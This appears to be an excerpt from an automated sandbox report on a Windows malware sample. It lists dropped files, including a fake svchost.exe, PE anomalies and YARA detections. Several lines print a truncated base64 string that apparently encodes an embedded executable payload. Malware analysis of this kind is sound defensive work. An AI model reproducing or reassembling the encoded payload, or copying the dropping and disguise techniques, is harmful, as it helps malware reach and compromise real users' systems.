Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: String function: 6E1B5720 appears 43 times
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: String function: 6E12B150 appears 128 times
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: String function: 6E17D08C appears 39 times
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: String function: 6AC7B150 appears 122 times
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: String function: 6AD05720 appears 33 times
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: String function: 6ACCD08C appears 34 times
PE file contains more sections than normal
Source: sqlite3.dll.31.dr Static PE information: Number of sections : 18 > 10
PE file contains strange resources
Source: 1D31.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: AE30.tmp.24.dr Static PE information: No import functions for PE file found
Source: AE30.tmp.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: bNdOhKPy0F.exe, 00000001.00000002.300344482.000000006E21F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bNdOhKPy0F.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Uses 32bit PE files
Source: bNdOhKPy0F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 0000001A.00000000.379753193.0000000140028000.00000008.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000020.00000000.403300320.0000000140028000.00000008.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: 2531.exe PID: 4396, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: C:\Windows\System\svchost.exe, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 18.2.2531.exe.3c51458.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 18.2.2531.exe.3c51458.1.unpack, type: UNPACKEDPE Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 32.0.svchost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 26.0.4DAB.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: svchost.exe.26.dr Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE
Source: svchost.exe.26.dr Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE
Source: 2531.exe.4.dr, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 18.2.2531.exe.6b0000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 18.0.2531.exe.6b0000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 22.2.2531.exe.240000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
